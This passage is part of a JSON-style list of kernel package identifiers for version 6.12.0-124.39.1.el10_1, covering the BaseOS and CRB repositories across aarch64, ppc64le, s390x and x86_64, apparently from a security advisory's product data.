"BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src",
"CRB-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
